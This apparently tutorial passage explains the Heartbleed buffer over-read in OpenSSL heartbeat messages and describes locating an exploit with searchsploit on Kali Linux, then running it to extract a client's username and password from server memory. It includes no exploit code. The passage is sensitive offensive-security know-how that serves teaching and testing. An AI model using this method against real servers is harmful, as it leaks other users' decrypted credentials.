Heartbleed is a buffer over-read vulnerability in the OpenSSL TLS implementation; this means that more data can be read from memory than should be allowed. By exploiting this vulnerability, an attacker can read information from the OpenSSL server memory in clear text, which means that we don't need to decrypt or even intercept any communication between the client and the server. The exploitation works by abusing the heartbeat messages exchanged by server and client; these are short messages sent by the client and answered by the server to keep the session active. In a vulnerable implementation, a client can claim to send a message of size X, while sending a smaller amount (Y) of bytes. The server will then respond with X bytes, taking the difference (X-Y) from the memory spaces contiguous to those where the received heartbeat message is stored. This memory space usually contains requests (already decrypted) that were previously sent by other clients.

Once we identify a vulnerable target, we use the searchsploit command; it is the interface to the local copy of Exploit-DB installed on Kali Linux, and it looks for a string in the exploit's title and description and displays the results.

Once we understand how the exploit works and determine it is safe to use, we run it against the target and collect the results. In our example, we were able to extract a valid username and password from a client connected over an encrypted channel.